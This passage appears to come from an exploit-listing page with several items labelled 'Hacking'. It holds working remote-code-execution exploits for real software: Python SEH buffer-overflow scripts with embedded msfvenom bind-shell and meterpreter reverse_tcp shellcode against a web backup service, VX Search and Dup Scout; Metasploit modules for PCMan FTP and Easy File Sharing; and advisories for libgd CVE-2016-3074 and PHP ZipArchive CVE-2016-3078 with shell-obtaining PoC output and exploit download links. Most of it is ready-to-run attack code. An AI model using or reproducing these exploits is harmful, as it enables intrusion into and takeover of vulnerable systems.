dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though # the user will need to have permission to delete folders. If the user has file delete permissions, file_ # will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can # be modified to adapt to a users permissions. import httplib target = 'webbackup' port = 80 sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login #example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm #msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a" shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae" "\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60" "\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01" "\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f" "\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c" "\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0" "\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e" "\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6" "\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c" "\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16" "\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b" "\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf" "\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf" "\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c" "\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8" "\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda" "\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf" "\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf" "\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73" "\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7" "\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50" "\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16" "\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c" "\x83\xd7\xfd\x8c\x3c") arg="folder_" #can also be changed to file_ if user has file delete permissions pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well junk1="A"*26400 #Initial pile of junk noppad="\x90"*296 #Place to land from our long jump and before our shellcode junkfill="\x90"*(768-len(shell)) #Fill in after our shellcode till nseh nseh="\xeb\x06\x90\x90" #Short jump over SEH seh="\xd7\x2a\x92\x5d" #pop esi # pop edi # ret RPCNS4.dll jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode junk2="D"*9500 #Junk at the end buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2) head = "Host: Wee! \r\n" head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n" head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" head += "Accept-Language: en-us,en;q=0.5\r\n" head += "Accept-Encoding: gzip, deflate\r\n" head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n" head += "Proxy-Connection: keep-alive\r\n" head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n" head += "Content-Length: 1337\r\n" head += "If-Modified-Since: *\r\n" head += "\r\n" head += "-----------------------------217830224120\r\n" head += "\r\n" head += "\r\n" head += "\r\n" head += buff conn = httplib.HTTPConnection(target,port) conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)
  18. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command', 'Description' => %q{ This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credientials are enabled. }, 'Author' => [ 'Jay Turla', # Initial Discovery -- @shipcod3 'Chris Higgins' # msf Module -- @ch1gg1ns ], 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '37731'], [ 'OSVDB', '94624'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x0A\x0D", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3 English', { 'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll 'Offset' => 2007 } ], ], 'DisclosureDate' => 'Aug 07 2015', 'DefaultTarget' => 0)) end def check connect_login disconnect if /220 PCMan's FTP Server 2\.0/ === banner Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit connect_login print_status('Generating payload...') sploit = rand_text_alpha(target['Offset']) sploit << [target.ret].pack('V') sploit << make_nops(16) sploit << payload.encoded send_cmd( ["PUT", sploit], false ) disconnect end end
  19. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow', 'Description' => %q{ This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. }, 'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>', 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '39008' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 390, 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ], ], 'DefaultOptions' => { 'RPORT' => 80 }, 'DisclosureDate' => 'Dec 2 2015', 'DefaultTarget' => 0)) end def print_status(msg='') super("#{peer} - #{msg}") end def exploit connect print_status("Sending exploit...") sploit = "GET " sploit << rand_text_alpha_upper(4061) sploit << generate_seh_record(target.ret) sploit << make_nops(19) sploit << payload.encoded sploit << make_nops(7) sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) sploit << " HTTP/1.0\r\n\r\n" sock.put(sploit) print_good("Exploit Sent") handler disconnect end end
  20. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ## Original Exploit Information ## # Date: 29 Aug 2015 # Exploit Author: Koby # Tested on: Windows XP SP3 # Link: https://www.exploit-db.com/exploits/38013/ ## Software Information ## # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0.7 ## Metasploit Module Information ## # Date: 16 April 2016 # Exploit Author: Jonathan Smith # Tested on: Windows XP SP2 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'PCMan RENAME overflow', 'Description' => 'This module exploits a buffer overflow in the RENAME command of PCMAN FTP Server 2.0.7. This requires authentication but anonymous credentials are enabled by default.', 'Author' => [ 'Metasploit module author: Jonathan Smith. Vulnerability originally discovered by Koby on 29 August 2015. Metasploit module developed 16 April 2016.'], 'Version' => '$Revision: 1 $', 'Platform' => ['win'], 'Targets' => [ [ 'Windows XP SP2', { } ],], 'DefaultTarget' => 0, 'License' => GPL_LICENSE, 'Payload' => {'BadChars' => "\x00\x0a\x0d"}, 'DefaultOptions' => {'EXITFUNC' => 'process'} )) end def exploit connect_login exploitcode = "A" * 2004 + "\x65\x82\xA5\x7C" + make_nops(30) + payload.encoded send_cmd( ['RENAME', exploitcode] , false ) disconnect end end
  21. Hacking

    Overview ======== libgd [1] is an open-source image library. It is perhaps primarily used by the PHP project. It has been bundled with the default installation of PHP since version 4.3 [2]. A signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which may result in a heap overflow when processing compressed gd2 data. Details ======= 4 bytes representing the chunk index size is stored in a signed integer, chunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers: libgd-2.1.1/src/gd_gd2.c: ,---- | 53 typedef struct { | 54 int offset; | 55 int size; | 56 } | 57 t_chunk_info; `---- libgd-2.1.1/src/gd_gd2.c: ,---- | 65 static int | 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy, | 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy, | 68 t_chunk_info ** chunkIdx) | 69 { | ... | 73 t_chunk_info *cidx; | ... | 155 if (gd2_compressed (*fmt)) { | ... | 163 for (i = 0; i < nc; i++) { | ... | 167 if (gdGetInt (&cidx[i].size, in) != 1) { | 168 goto fail2; | 169 }; | 170 }; | 171 *chunkIdx = cidx; | 172 }; | ... | 181 } `---- `gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then allocates memory for the compressed data based on the value of the largest chunk size: libgd-2.1.1/src/gd_gd2.c: ,---- | 371|637 if (gd2_compressed (fmt)) { | 372|638 /* Find the maximum compressed chunk size. */ | 373|639 compMax = 0; | 374|640 for (i = 0; (i < nc); i++) { | 375|641 if (chunkIdx[i].size > compMax) { | 376|642 compMax = chunkIdx[i].size; | 377|643 }; | 378|644 }; | 379|645 compMax++; | ...|... | 387|656 compBuf = gdCalloc (compMax, 1); | ...|... | 393|661 }; `---- A size of <= 0 results in `compMax' retaining its initial value during the loop, followed by it being incremented to 1. Since `compMax' is used as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation for `compBuf'. This is followed by compressed data being read to `compBuf' based on the current (potentially negative) chunk size: libgd-2.1.1/src/gd_gd2.c: ,---- | 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in) | 340 { | ... | 413 if (gd2_compressed (fmt)) { | 414 | 415 chunkLen = chunkMax; | 416 | 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, | 418 compBuf, | 419 chunkIdx[chunkNum].size, | 420 (char *) chunkBuf, &chunkLen, in)) { | 421 GD2_DBG (printf ("Error reading comproessed chunk\n")); | 422 goto fail; | 423 }; | 424 | 425 chunkPos = 0; | 426 }; | ... | 501 } `---- libgd-2.1.1/src/gd_gd2.c: ,---- | 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h) | 586 { | ... | 713 if (!gd2_compressed (fmt)) { | ... | 731 } else { | 732 chunkNum = cx + cy * ncx; | 733 | 734 chunkLen = chunkMax; | 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, | 736 compBuf, | 737 chunkIdx[chunkNum].size, | 738 (char *) chunkBuf, &chunkLen, in)) { | 739 printf ("Error reading comproessed chunk\n"); | 740 goto fail2; | 741 }; | ... | 746 }; | ... | 815 } `---- The size is subsequently interpreted as a size_t by `fread()' or `memcpy()', depending on how the image is read: libgd-2.1.1/src/gd_gd2.c: ,---- | 221 static int | 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf, | 223 uLongf * chunkLen, gdIOCtx * in) | 224 { | ... | 236 if (gdGetBuf (compBuf, compSize, in) != compSize) { | 237 return FALSE; | 238 }; | ... | 251 } `---- libgd-2.1.1/src/gd_io.c: ,---- | 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx) | 212 { | 213 return (ctx->getBuf)(ctx, buf, size); | 214 } `---- For file contexts: libgd-2.1.1/src/gd_io_file.c: ,---- | 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f) | 53 { | ... | 67 ctx->ctx.getBuf = fileGetbuf; | ... | 76 } | ... | 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size) | 93 { | 94 fileIOCtx *fctx; | 95 fctx = (fileIOCtx *)ctx; | 96 | 97 return (fread(buf, 1, size, fctx->f)); | 98 } `---- And for dynamic contexts: libgd-2.1.1/src/gd_io_dp.c: ,---- | 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag) | 75 { | ... | 95 ctx->ctx.getBuf = dynamicGetbuf; | ... | 104 } | ... | 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len) | 257 { | ... | 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen); | ... | 284 } `---- PoC === Against Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]: ,---- | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php | [*] this may take a while | [*] offset 912 of 10000... | [+] connected to 1.2.3.4:5555 | id | uid=33(www-data) gid=33(www-data) groups=33(www-data) | | uname -a | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC | 2016 x86_64 x86_64 x86_64 GNU/Linux | | dpkg -l|grep -E "php5-(fpm|gd)" | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... | | cat upload.php | <?php | imagecreatefromgd2($_FILES["file"]["tmp_name"]); | ?> `---- Solution ======== This bug has been fixed in git HEAD [4]. Full Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip Footnotes _________ [1] [http://libgd.org/] [2] [https://en.wikipedia.org/wiki/Libgd] [3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074] [4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]
  22. Hacking

    Details ======= An integer wrap may occur in PHP 7.x before version 7.0.6 when reading zip files with the getFromIndex() and getFromName() methods of ZipArchive, resulting in a heap overflow. php-7.0.5/ext/zip/php_zip.c ,---- | 2679 static void php_zip_get_from(INTERNAL_FUNCTION_PARAMETERS, int type) /* {{{ */ | 2680 { | .... | 2684 struct zip_stat sb; | .... | 2689 zend_long len = 0; | .... | 2692 zend_string *buffer; | .... | 2702 if (type == 1) { | 2703 if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|ll", &filename, &len, &flags) == FAILURE) { | 2704 return; | 2705 } | 2706 PHP_ZIP_STAT_PATH(intern, ZSTR_VAL(filename), ZSTR_LEN(filename), flags, sb); // (1) | 2707 } else { | 2708 if (zend_parse_parameters(ZEND_NUM_ARGS(), "l|ll", &index, &len, &flags) == FAILURE) { | 2709 return; | 2710 } | 2711 PHP_ZIP_STAT_INDEX(intern, index, 0, sb); // (1) | 2712 } | .... | 2718 if (len < 1) { | 2719 len = sb.size; | 2720 } | .... | 2731 buffer = zend_string_alloc(len, 0); // (2) | 2732 n = zip_fread(zf, ZSTR_VAL(buffer), ZSTR_LEN(buffer)); // (3) | .... | 2742 } `---- With `sb.size' from (1) being: php-7.0.5/ext/zip/lib/zip_stat_index.c ,---- | 038 ZIP_EXTERN int | 039 zip_stat_index(zip_t *za, zip_uint64_t index, zip_flags_t flags, | 040 zip_stat_t *st) | 041 { | ... | 043 zip_dirent_t *de; | 044 | 045 if ((de=_zip_get_dirent(za, index, flags, NULL)) == NULL) | 046 return -1; | ... | 063 st->size = de->uncomp_size; | ... | 086 } `---- Both `size' and `uncomp_size' are unsigned 64bit integers: php-7.0.5/ext/zip/lib/zipint.h ,---- | 339 struct zip_dirent { | ... | 351 zip_uint64_t uncomp_size; /* (cl) size of uncompressed data */ | ... | 332 }; `---- php-7.0.5/ext/zip/lib/zip.h ,---- | 279 struct zip_stat { | ... | 283 zip_uint64_t size; /* size of file (uncompressed) */ | ... | 290 }; `---- Whereas `len' is signed and has a platform-dependent size: php-7.0.5/Zend/zend_long.h ,---- | 028 #if defined(__x86_64__) || defined(__LP64__) || defined(_LP64) || defined(_WIN64) | 029 # define ZEND_ENABLE_ZVAL_LONG64 1 | 030 #endif | ... | 033 #ifdef ZEND_ENABLE_ZVAL_LONG64 | 034 typedef int64_t zend_long; | ... | 043 #else | 044 typedef int32_t zend_long; | ... | 053 #endif `---- Uncompressed file sizes in zip-archives may be specified as either 32- or 64bit values; with the latter requiring that the size be specified in the extra field in zip64 mode. Anyway, as for the invocation of `zend_string_alloc()' in (2): php-7.0.5/Zend/zend_string.h ,---- | 119 static zend_always_inline zend_string *zend_string_alloc(size_t len, int persistent) | 120 { | 121 zend_string *ret = (zend_string *)pemalloc(ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(len)), persistent); // (4) | ... | 133 ZSTR_LEN(ret) = len; // (5) | 134 return ret; | 135 } `---- The `size' argument to the `pemalloc' macro is aligned/adjusted in (4) whilst the *original* value of `len' is stored as the size of the allocated buffer in (5). No boundary checking is done in (4) and it may thus wrap, which would lead to a heap overflow during the invocation of `zip_fread()' in (3) as the `toread' argument is `ZSTR_LEN(buffer)': php-7.0.5/Zend/zend_string.h ,---- | 041 #define ZSTR_LEN(zstr) (zstr)->len `---- On a 32bit system: ,---- | (gdb) p/x ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(0xfffffffe)) | $1 = 0x10 `---- The wraparound may also occur on 64bit systems with `uncomp_size' specified in the extra field (Zip64 mode; ext/zip/lib/zip_dirent.c:463). However, it won't result in a buffer overflow because of `zip_fread()' bailing on a size that would have wrapped the allocation in (4): php-7.0.5/ext/zip/lib/zip_fread.c ,---- | 038 ZIP_EXTERN zip_int64_t | 039 zip_fread(zip_file_t *zf, void *outbuf, zip_uint64_t toread) | 040 { | ... | 049 if (toread > ZIP_INT64_MAX) { | 050 zip_error_set(&zf->error, ZIP_ER_INVAL, 0); | 051 return -1; | 052 } | ... | 063 } `---- php-7.0.5/ext/zip/lib/zipconf.h ,---- | 130 #define ZIP_INT64_MAX 0x7fffffffffffffffLL `---- ,---- | (gdb) p/x ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(0x7fffffffffffffff)) | $1 = 0x8000000000000018 `---- PoC === Against Arch Linux i686 with php-fpm 7.0.5 behind nginx [1]: ,---- | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php | [*] this may take a while | [*] 103 of 4096 (0x67fd0)... | [+] connected to 1.2.3.4:5555 | | id | uid=33(http) gid=33(http) groups=33(http) | | uname -a | Linux arch32 4.5.1-1-ARCH #1 SMP PREEMPT Thu Apr 14 19:36:01 CEST | 2016 i686 GNU/Linux | | pacman -Qs php-fpm | local/php-fpm 7.0.5-2 | FastCGI Process Manager for PHP | | cat upload.php | <?php | $zip = new ZipArchive(); | if ($zip->open($_FILES["file"]["tmp_name"]) !== TRUE) { | echo "cannot open archive\n"; | } else { | for ($i = 0; $i < $zip->numFiles; $i++) { | $data = $zip->getFromIndex($i); | } | $zip->close(); | } | ?> `---- Solution ======== This issue has been fixed in php 7.0.6. Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39742.zip https://github.com/dyntopia/exploits/tree/master/CVE-2016-3078
  23. Hacking

    #!/usr/bin/python print "VX Search Enterprise 9.0.26 Buffer Overflow Exploit" print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" #Author website: www.tulpa-security.com #Author twitter: @tulpa_security #Exploit will land you NT AUTHORITY\SYSTEM #You do not need to be authenticated, password below is garbage #Swop out IP, shellcode and remember to adjust '\x41' for bytes #Tested on Windows 7 x86 Enterprise SP1 #Greetings to ozzie_offsec and carbonated import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.123.132',80)) #bad chars \x00\x0a\x0d\x26 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest #payload size 308 buf = "" buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" #pop pop ret 100159be nseh = "\x90\x90\xEB\x0B" seh = "\xbe\x59\x01\x10" egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" evil = "POST /login HTTP/1.1\r\n" evil += "Host: 192.168.123.132\r\n" evil += "User-Agent: Mozilla/5.0\r\n" evil += "Connection: close\r\n" evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" evil += "Accept-Language: en-us,en;q=0.5\r\n" evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" evil += "Keep-Alive: 300\r\n" evil += "Proxy-Connection: keep-alive\r\n" evil += "Content-Type: application/x-www-form-urlencoded\r\n" evil += "Content-Length: 17000\r\n\r\n" evil += "username=admin" evil += "&password=aaaaa\r\n" evil += "\x41" * 12292 #subtract/add for payload evil += "w00tw00t" evil += "\x90" * 20 evil += buf evil += "\x90" * 50 evil += "\x42" * 1614 evil += nseh evil += seh evil += "\x90" * 20 evil += egghunter evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' s.close()
  24. Hacking

    #!/usr/bin/python print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit" print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" #Author website: www.tulpa-security.com #Author twitter: @tulpa_security #Exploit will land you NT AUTHORITY\SYSTEM #You do not need to be authenticated, password below is garbage #Swop out IP, shellcode and remember to adjust '\x41' for bytes #Tested on Windows 7 x86 Enterprise SP1 #Shout-out to carbonated and ozzie_offsec import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.123.132',80)) #bad chars \x00\x0a\x0d\x26 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest #payload size 308 buf = "" buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" #pop pop ret 1006cd33 nseh = "\x90\x90\xEB\x0B" seh = "\x33\xcd\x06\x10" egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" evil = "POST /login HTTP/1.1\r\n" evil += "Host: 192.168.123.132\r\n" evil += "User-Agent: Mozilla/5.0\r\n" evil += "Connection: close\r\n" evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" evil += "Accept-Language: en-us,en;q=0.5\r\n" evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" evil += "Keep-Alive: 300\r\n" evil += "Proxy-Connection: keep-alive\r\n" evil += "Content-Type: application/x-www-form-urlencoded\r\n" evil += "Content-Length: 17000\r\n\r\n" evil += "username=admin" evil += "&password=aaaaa\r\n" evil += "\x41" * 12292 #subtract/add for payload evil += "w00tw00t" evil += "\x90" * 20 evil += buf evil += "\x90" * 50 evil += "\x42" * 1614 evil += nseh evil += seh evil += "\x90" * 20 evil += egghunter evil += "\x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' s.close()
  25. Hacking

